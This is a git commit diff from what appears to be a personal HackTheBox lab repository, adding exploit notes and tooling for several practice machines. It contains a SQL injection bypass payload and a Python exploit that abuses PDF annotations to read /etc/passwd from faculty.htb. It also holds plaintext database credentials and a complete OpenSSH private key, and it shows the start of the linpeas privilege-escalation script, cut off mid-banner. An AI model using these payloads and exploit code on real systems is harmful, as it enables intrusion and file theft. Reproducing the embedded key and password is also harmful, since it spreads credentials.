aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorRaghuram Subramani <raghus2247@gmail.com>2022-09-04 05:04:04 -0400
committerRaghuram Subramani <raghus2247@gmail.com>2022-09-04 05:04:04 -0400
commitf914e816092f02a4bbed779ad91a6641e7cc2122 (patch)
tree1c7dd2f7f2946ac4d80cb6f3147cbd5ec0b2b4af
parent869200611b92f0dee181a89ffb8f3f9123794d43 (diff)
add rooms
-rw-r--r--.gitignore1
-rw-r--r--faculty/README.md14
-rw-r--r--faculty/code.html2
-rw-r--r--faculty/exploit.py14
-rw-r--r--faculty/file.pdfbin0 -> 2637 bytes
-rw-r--r--faculty/id_rsa38
-rw-r--r--faculty/linpeas.sh5512
-rw-r--r--faculty/nmap22
-rw-r--r--faculty/passwd37
-rw-r--r--redeemer/rustscan73
-rw-r--r--responder/hash.txt1
-rw-r--r--responder/rustscan80
-rw-r--r--support/20220819205517_final.zipbin0 -> 12820 bytes
-rw-r--r--support/README.md37
-rw-r--r--support/UserInfo.exe.zipbin0 -> 277499 bytes
-rw-r--r--support/administrator.ccachebin0 -> 1584 bytes
-rw-r--r--support/domaindump/domain_computers.grep5
-rw-r--r--support/domaindump/domain_computers.html37
-rw-r--r--support/domaindump/domain_computers.json476
-rw-r--r--support/domaindump/domain_computers_by_os.html41
-rw-r--r--support/domaindump/domain_groups.grep50
-rw-r--r--support/domaindump/domain_groups.html82
-rw-r--r--support/domaindump/domain_groups.json3142
-rw-r--r--support/domaindump/domain_policy.grep2
-rw-r--r--support/domaindump/domain_policy.html34
-rw-r--r--support/domaindump/domain_policy.json176
-rw-r--r--support/domaindump/domain_trusts.grep1
-rw-r--r--support/domaindump/domain_trusts.html33
-rw-r--r--support/domaindump/domain_trusts.json1
-rw-r--r--support/domaindump/domain_users.grep21
-rw-r--r--support/domaindump/domain_users.html53
-rw-r--r--support/domaindump/domain_users.json2242
-rw-r--r--support/domaindump/domain_users_by_group.html95
-rw-r--r--support/ldap_server_info118
-rw-r--r--support/output1400
-rw-r--r--support/powershell-web-server.ps1111
-rw-r--r--support/rustscan148
-rw-r--r--support/shell.exebin0 -> 73802 bytes
-rw-r--r--support/support.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI2
-rw-r--r--support/support.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.infbin0 -> 1264 bytes
-rw-r--r--support/support.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI2
-rw-r--r--support/support.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.infbin0 -> 3764 bytes
-rw-r--r--support/userinfo/CommandLineParser.dllbin0 -> 99840 bytes
-rw-r--r--support/userinfo/Microsoft.Bcl.AsyncInterfaces.dllbin0 -> 22144 bytes
-rw-r--r--support/userinfo/Microsoft.Extensions.DependencyInjection.Abstractions.dllbin0 -> 47216 bytes
-rw-r--r--support/userinfo/Microsoft.Extensions.DependencyInjection.dllbin0 -> 84608 bytes
-rw-r--r--support/userinfo/Microsoft.Extensions.Logging.Abstractions.dllbin0 -> 64112 bytes
-rw-r--r--support/userinfo/System.Buffers.dllbin0 -> 20856 bytes
-rw-r--r--support/userinfo/System.Memory.dllbin0 -> 141184 bytes
-rw-r--r--support/userinfo/System.Numerics.Vectors.dllbin0 -> 115856 bytes
-rw-r--r--support/userinfo/System.Runtime.CompilerServices.Unsafe.dllbin0 -> 18024 bytes
-rw-r--r--support/userinfo/System.Threading.Tasks.Extensions.dllbin0 -> 25984 bytes
-rw-r--r--support/userinfo/UserInfo.exebin0 -> 12288 bytes
-rw-r--r--support/userinfo/UserInfo.exe.config14
-rw-r--r--support/userinfo/exploit.cs11
-rw-r--r--support/usernames.txt15
-rw-r--r--three/rustscan88
-rw-r--r--three/shell.php1
-rw-r--r--three/shell.sh1
-rw-r--r--timelapse/nmap86
60 files changed, 14319 insertions, 0 deletions
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..0d3a016
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+*.ovpn
diff --git a/faculty/README.md b/faculty/README.md
new file mode 100644
index 0000000..7b505de
--- /dev/null
+++ b/faculty/README.md
@@ -0,0 +1,14 @@
+> injection on /admin
+```
+' OR 1=1 #
+```
+
+> mysql
+```php
+<?php
+$conn = new mysqli('localhost','sched','Co.met06aci.dly53ro.per','scheduling_db')
+
+or
+die("Could not connect to mysql".mysqli_error($con));
+```
+
diff --git a/faculty/code.html b/faculty/code.html
new file mode 100644
index 0000000..7521cad
--- /dev/null
+++ b/faculty/code.html
@@ -0,0 +1,2 @@
+The PDF is dark and full of attachments
+ <annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
diff --git a/faculty/exploit.py b/faculty/exploit.py
new file mode 100644
index 0000000..5bda40d
--- /dev/null
+++ b/faculty/exploit.py
@@ -0,0 +1,14 @@
+import urllib.parse
+import urllib.request
+import base64
+import requests
+import os
+
+with open('code.html') as h:
+ code = h.read().strip()
+ueCode = urllib.parse.quote(urllib.parse.quote(code))
+b64enc = base64.b64encode(ueCode.encode("ascii")).decode('UTF-8')
+
+r = requests.post('http://faculty.htb/admin/download.php', data={"pdf": b64enc}, cookies={"PHPSESSID": "s7qhujjj9qmqoeju6enate61nj"})
+
+urllib.request.urlretrieve(f'http://faculty.htb/mpdf/tmp/{r.text}', 'file.pdf')
diff --git a/faculty/file.pdf b/faculty/file.pdf
new file mode 100644
index 0000000..56eb093
--- /dev/null
+++ b/faculty/file.pdf
Binary files differ
diff --git a/faculty/id_rsa b/faculty/id_rsa
new file mode 100644
index 0000000..c133c43
--- /dev/null
+++ b/faculty/id_rsa
@@ -0,0 +1,38 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+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
+-----END OPENSSH PRIVATE KEY-----
diff --git a/faculty/linpeas.sh b/faculty/linpeas.sh
new file mode 100644
index 0000000..81e5e97
--- /dev/null
+++ b/faculty/linpeas.sh
@@ -0,0 +1,5512 @@
+#!/bin/sh
+
+VERSION="ng"
+ADVISORY="This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission."
+
+###########################################
+#-------) Checks pre-everything (---------#
+###########################################
+if ([ -f /usr/bin/id ] && [ "$(/usr/bin/id -u)" -eq "0" ]) || [ "`whoami 2>/dev/null`" = "root" ]; then
+ IAMROOT="1"
+ MAXPATH_FIND_W="3"
+else
+ IAMROOT=""
+ MAXPATH_FIND_W="7"
+fi
+
+
+###########################################
+#---------------) Colors (----------------#
+###########################################
+
+C=$(printf '\033')
+RED="${C}[1;31m"
+SED_RED="${C}[1;31m&${C}[0m"
+GREEN="${C}[1;32m"
+SED_GREEN="${C}[1;32m&${C}[0m"
+YELLOW="${C}[1;33m"
+SED_YELLOW="${C}[1;33m&${C}[0m"
+SED_RED_YELLOW="${C}[1;31;103m&${C}[0m"
+BLUE="${C}[1;34m"
+SED_BLUE="${C}[1;34m&${C}[0m"
+ITALIC_BLUE="${C}[1;34m${C}[3m"
+LIGHT_MAGENTA="${C}[1;95m"
+SED_LIGHT_MAGENTA="${C}[1;95m&${C}[0m"
+LIGHT_CYAN="${C}[1;96m"
+SED_LIGHT_CYAN="${C}[1;96m&${C}[0m"
+LG="${C}[1;37m" #LightGray
+SED_LG="${C}[1;37m&${C}[0m"
+DG="${C}[1;90m" #DarkGray
+SED_DG="${C}[1;90m&${C}[0m"
+NC="${C}[0m"
+UNDERLINED="${C}[5m"
+ITALIC="${C}[3m"
+
+
+###########################################
+#---------) Parsing parameters (----------#
+###########################################
+# --) FAST - Do not check 1min of procceses and su brute
+# --) SUPERFAST - FAST & do not search for special filaes in all the folders
+
+if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi
+FAST="1" #By default stealth/fast mode
+SUPERFAST=""
+DISCOVERY=""
+PORTS=""
+QUIET=""
+CHECKS="system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files,api_keys_regex"
+SEARCH_IN_FOLDER=""
+ROOT_FOLDER="/"
+WAIT=""
+PASSWORD=""
+NOCOLOR=""
+DEBUG=""
+AUTO_NETWORK_SCAN=""
+EXTRA_CHECKS=""
+REGEXES=""
+THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")"
+[ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2
+[ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2
+[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2
+HELP=$GREEN"Enumerate and search Privilege Escalation vectors.
+${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors.
+ ${GREEN} Checks:
+ ${YELLOW} -o${BLUE} Only execute selected checks (system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files,api_keys_regex). Select a comma separated list.
+ ${YELLOW} -s${BLUE} Stealth & faster (don't check some time consuming checks)
+ ${YELLOW} -e${BLUE} Perform extra enumeration
+ ${YELLOW} -t${BLUE} Automatic network scan & Internet conectivity checks - This option writes to files
+ ${YELLOW} -r${BLUE} Enable Regexes (this can take from some mins to hours)
+ ${YELLOW} -P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su'
+ ${YELLOW} -D${BLUE} Debug mode
+
+ ${GREEN} Network recon:
+ ${YELLOW} -t${BLUE} Automatic network scan & Internet conectivity checks - This option writes to files
+ ${YELLOW} -d <IP/NETMASK>${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24
+ ${YELLOW} -p <PORT(s)> -d <IP/NETMASK>${BLUE} Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139
+ ${YELLOW} -i <IP> [-p <PORT(s)>]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
+ $GREEN Notice${BLUE} that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed
+
+ ${GREEN} Firmware recon:
+ ${YELLOW} -f </FOLDER/PATH>${BLUE} Execute linpeas to search passwords/file permissions misconfigs inside a folder
+
+ ${GREEN} Misc:
+ ${YELLOW} -h${BLUE} To show this message
+ ${YELLOW} -w${BLUE} Wait execution between big blocks of checks
+ ${YELLOW} -L${BLUE} Force linpeas execution
+ ${YELLOW} -M${BLUE} Force macpeas execution
+ ${YELLOW} -q${BLUE} Do not show banner
+ ${YELLOW} -N${BLUE} Do not use colours$NC"
+
+while getopts "h?asd:p:i:P:qo:LMwNDterf:" opt; do
+ case "$opt" in
+ h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;;
+ a) FAST="";EXTRA_CHECKS="1";;
+ s) SUPERFAST=1;;
+ d) DISCOVERY=$OPTARG;;
+ p) PORTS=$OPTARG;;
+ i) IP=$OPTARG;;
+ P) PASSWORD=$OPTARG;;
+ q) QUIET=1;;
+ o) CHECKS=$OPTARG;;
+ L) MACPEAS="";;
+ M) MACPEAS="1";;
+ w) WAIT=1;;
+ N) NOCOLOR="1";;
+ D) DEBUG="1";;
+ t) AUTO_NETWORK_SCAN="1";;
+ e) EXTRA_CHECKS="1";;
+ r) REGEXES="1";;
+ f) SEARCH_IN_FOLDER=$OPTARG; ROOT_FOLDER=$OPTARG; REGEXES="1"; CHECKS="software_information,interesting_files,api_keys_regex";;
+ esac
+done
+
+if [ "$MACPEAS" ]; then SCRIPTNAME="macpeas"; else SCRIPTNAME="linpeas"; fi
+if [ "$NOCOLOR" ]; then
+ C=""
+ RED=""
+ SED_RED="&"
+ GREEN=""
+ SED_GREEN="&"
+ YELLOW=""
+ SED_YELLOW="&"
+ SED_RED_YELLOW="&"
+ BLUE=""
+ SED_BLUE="&"
+ ITALIC_BLUE=""
+ LIGHT_MAGENTA=""
+ SED_LIGHT_MAGENTA="&"
+ LIGHT_CYAN=""
+ SED_LIGHT_CYAN="&"
+ LG=""
+ SED_LG="&"
+ DG=""
+ SED_DG="&"
+ NC=""
+ UNDERLINED=""
+ ITALIC=""
+fi
+
+
+###########################################
+#---------------) BANNER (----------------#
+###########################################
+
+print_banner(){
+ if [ "$MACPEAS" ]; then
+ bash -c "printf ' \e[38;5;238m▄\e[38;5;233m▄\e[38;5;235m▄\e[38;5;65m▄\e[48;5;239m\e[38;5;107m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;240m\e[38;5;65m▄\e[0m\e[38;5;237m▄\e[38;5;234m▄\e[38;5;233m▄\e[38;5;232m▄\e[38;5;239m▄\e[0m
+ \e[38;5;233m▄\e[38;5;246m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;71m \e[38;5;65m▄\e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m \e[48;5;65m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[0m\e[38;5;237m▄\e[38;5;234m▄\e[0m
+ \e[38;5;245m▄\e[38;5;233m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;239m\e[38;5;71m▄\e[48;5;71m \e[38;5;235m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;236m\e[38;5;64m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;2m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;2m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;232m\e[38;5;70m▄\e[48;5;234m\e[38;5;22m▄\e[48;5;65m\e[38;5;232m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m \e[48;5;237m\e[38;5;71m▄\e[48;5;236m\e[38;5;71m▄\e[0m\e[38;5;234m▄\e[38;5;238m▄\e[0m
+ \e[38;5;239m▄\e[38;5;233m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;238m\e[38;5;71m▄\e[48;5;71m \e[38;5;0m▄\e[48;5;236m\e[38;5;2m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m \e[38;5;70m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m \e[48;5;22m\e[38;5;76m▄\e[48;5;0m\e[38;5;76m▄\e[48;5;234m\e[38;5;64m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m \e[48;5;234m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[0m\e[38;5;234m▄\e[38;5;233m▄\e[0m
+ \e[38;5;233m▄\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;71m \e[38;5;235m▄\e[48;5;65m\e[38;5;235m▄\e[48;5;0m\e[38;5;255m▄\e[48;5;22m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;242m\e[38;5;15m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;254m\e[38;5;15m▄\e[48;5;15m \e[38;5;255m▄\e[48;5;255m\e[38;5;234m▄\e[48;5;248m\e[38;5;251m▄\e[48;5;240m\e[38;5;15m▄\e[48;5;237m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;64m\e[38;5;15m▄\e[48;5;70m\e[38;5;251m▄\e[48;5;76m\e[38;5;8m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;64m\e[38;5;70m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;238m\e[38;5;2m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m \e[48;5;237m\e[38;5;71m▄\e[0m
+ \e[38;5;233m▄\e[48;5;238m\e[38;5;71m▄\e[48;5;236m\e[38;5;71m▄\e[48;5;71m \e[38;5;65m▄\e[48;5;238m\e[38;5;234m▄\e[48;5;235m\e[38;5;255m▄\e[48;5;15m \e[38;5;233m▄\e[48;5;253m\e[38;5;0m▄\e[48;5;255m\e[38;5;232m▄\e[48;5;242m\e[38;5;238m▄\e[48;5;242m\e[38;5;233m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;255m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;145m\e[38;5;15m▄\e[48;5;237m\e[38;5;15m▄\e[48;5;22m\e[38;5;255m▄\e[48;5;70m\e[38;5;248m▄\e[48;5;234m\e[38;5;235m▄\e[48;5;234m\e[38;5;233m▄\e[48;5;71m\e[38;5;0m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m \e[0m
+ \e[48;5;71m \e[38;5;234m▄\e[48;5;233m\e[38;5;251m▄\e[48;5;255m\e[38;5;15m▄\e[48;5;15m \e[48;5;243m\e[38;5;235m▄\e[48;5;0m \e[38;5;243m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;232m\e[38;5;15m▄\e[48;5;235m\e[38;5;145m▄\e[48;5;71m\e[38;5;0m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;237m▄\e[0m
+ \e[48;5;71m \e[48;5;65m\e[38;5;232m▄\e[48;5;241m\e[38;5;15m▄\e[48;5;15m \e[48;5;236m\e[38;5;245m▄\e[48;5;0m \e[48;5;247m\e[38;5;232m▄\e[48;5;15m \e[48;5;247m\e[38;5;15m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m \e[48;5;237m\e[38;5;236m▄\e[0m
+ \e[48;5;71m \e[38;5;238m▄\e[48;5;234m\e[38;5;243m▄\e[48;5;253m\e[38;5;15m▄\e[48;5;15m \e[48;5;0m\e[38;5;7m▄\e[48;5;0m\e[38;5;239m▄\e[48;5;0m\e[38;5;102m▄\e[48;5;0m\e[38;5;234m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;252m▄\e[48;5;255m\e[38;5;15m▄\e[48;5;15m \e[48;5;239m\e[38;5;7m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m \e[0m
+ \e[48;5;71m \e[38;5;236m▄\e[48;5;234m\e[38;5;250m▄\e[48;5;15m \e[38;5;255m▄\e[48;5;15m\e[38;5;250m▄\e[48;5;15m\e[38;5;102m▄\e[48;5;15m\e[38;5;238m▄\e[48;5;15m\e[38;5;235m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;2m▄\e[48;5;255m\e[38;5;2m▄\e[48;5;255m\e[38;5;64m▄\e[48;5;254m\e[38;5;70m▄\e[48;5;188m\e[38;5;70m▄\e[48;5;253m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;15m\e[38;5;28m▄\e[48;5;15m\e[38;5;64m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;240m▄\e[48;5;15m\e[38;5;102m▄\e[48;5;15m\e[38;5;251m▄\e[48;5;15m\e[38;5;255m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;234m\e[38;5;235m▄\e[48;5;236m \e[0m
+ \e[48;5;71m \e[38;5;233m▄\e[48;5;232m\e[38;5;70m▄\e[48;5;238m\e[38;5;76m▄\e[48;5;65m\e[38;5;76m▄\e[48;5;236m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m \e[48;5;70m\e[38;5;76m▄\e[48;5;28m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;235m\e[38;5;76m▄\e[48;5;240m\e[38;5;76m▄\e[48;5;145m\e[38;5;76m▄\e[48;5;15m\e[38;5;28m▄\e[48;5;15m\e[38;5;235m▄\e[48;5;15m\e[38;5;240m▄\e[48;5;15m\e[38;5;145m▄\e[48;5;15m\e[38;5;254m▄\e[48;5;15m \e[48;5;242m\e[38;5;251m▄\e[48;5;236m\e[38;5;235m▄\e[0m
+ \e[48;5;65m\e[38;5;232m▄\e[48;5;235m\e[38;5;64m▄\e[48;5;70m \e[48;5;76m \e[48;5;2m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;242m\e[38;5;76m▄\e[48;5;254m\e[38;5;64m▄\e[48;5;15m\e[38;5;234m▄\e[48;5;15m\e[38;5;243m▄\e[48;5;15m\e[38;5;253m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;233m \e[0m
+ \e[48;5;232m \e[48;5;237m \e[48;5;70m \e[48;5;76m \e[38;5;70m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m \e[38;5;70m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;234m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m \e[48;5;28m\e[38;5;76m▄\e[48;5;235m\e[38;5;76m▄\e[48;5;102m\e[38;5;236m▄\e[48;5;250m\e[38;5;235m▄\e[48;5;233m\e[38;5;232m▄\e[0m
+ \e[48;5;232m \e[48;5;237m \e[48;5;70m \e[48;5;76m \e[48;5;70m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;233m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;76m \e[48;5;22m\e[38;5;76m▄\e[48;5;233m\e[38;5;76m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;28m\e[38;5;76m▄\e[48;5;76m \e[48;5;70m \e[48;5;236m \e[48;5;238m \e[48;5;236m\e[0m
+ \e[48;5;232m\e[38;5;236m▄\e[48;5;236m\e[38;5;233m▄\e[48;5;64m \e[48;5;76m \e[48;5;70m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;76m \e[38;5;64m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m \e[48;5;233m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m \e[48;5;64m \e[48;5;236m \e[38;5;235m▄\e[0m
